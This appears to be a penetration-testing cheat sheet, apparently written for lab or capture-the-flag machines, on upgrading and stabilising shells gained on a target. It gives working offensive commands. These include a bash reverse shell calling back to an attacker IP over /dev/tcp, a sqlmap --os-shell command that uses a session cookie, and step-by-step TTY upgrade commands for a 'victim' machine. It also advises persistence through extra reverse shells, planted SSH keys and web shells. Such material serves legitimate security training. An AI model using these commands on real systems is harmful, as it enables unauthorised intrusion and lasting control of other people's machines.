CheatSheet

Enhancing Your Shell

Techniques for upgrading basic shells to fully interactive TTY shells.

Helpful Guides

Using Python

The most common method for spawning a TTY shell using Python's pty module:

python -c "import pty;pty.spawn('/bin/bash')"

Using Bash

Alternative method using the script command to spawn a bash shell:

SHELL=/bin/bash script -q /dev/null

Getting a More Stable Shell Via Reverse Shell

Establish a reverse shell connection directly to your attacking machine:

bash -c "bash -i >& /dev/tcp/10.10.14.43/443 0>&1"

Note: Replace the IP address and port with your attacking machine's details.

Getting a Shell with SqlMap

Use SqlMap's built-in OS shell feature to spawn a shell through SQL injection:

sqlmap -u 'http://10.129.129.83/dashboard.php?search=any+query' --cookie="PHPSESSID=7s708ososphb91h343iqr2ss7a" --os-shell

Getting an Interactive Shell (Python3)

The complete process to upgrade a basic reverse shell to a fully interactive TTY shell:

Step 1: Spawn a PTY

On the victim machine, run within your basic shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Step 2: Background the Process

Press Ctrl+Z to background the shell:

^Z

Step 3: Configure Terminal Settings

On your attacking machine, disable terminal echo and set raw mode:

stty raw -echo

Step 4: Foreground the Process

Return to the backgrounded shell:

fg

Step 5: Reinitialize Bash

In the newly foregrounded shell, run:

bash

Result: You now have a fully interactive shell with tab completion, command history, and proper terminal handling.

Enhancing the Shell to Clear Screen

If you encounter the error "TERM environment variable not set" when trying to use commands like clear, set the TERM variable:

export TERM=xterm

This enables proper terminal emulation and allows you to use terminal-specific commands like clear, vim, nano, and others that require terminal control sequences.

Establishing Another Shell

Once you have initial access, it's often beneficial to establish multiple shell sessions for stability and redundancy. This can be done by:

  • Setting up additional reverse shells to different ports
  • Creating SSH access if you have credentials or can write SSH keys
  • Using screen or tmux sessions for persistence
  • Deploying web shells for HTTP-based access

Having multiple access points ensures you maintain access even if one shell dies or becomes unstable.

Quick Reference

Complete Upgrade Process (One-liner reference):

# On victim:
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Press Ctrl+Z

# On attacker:
stty raw -echo; fg

# On victim (after fg):
bash
export TERM=xterm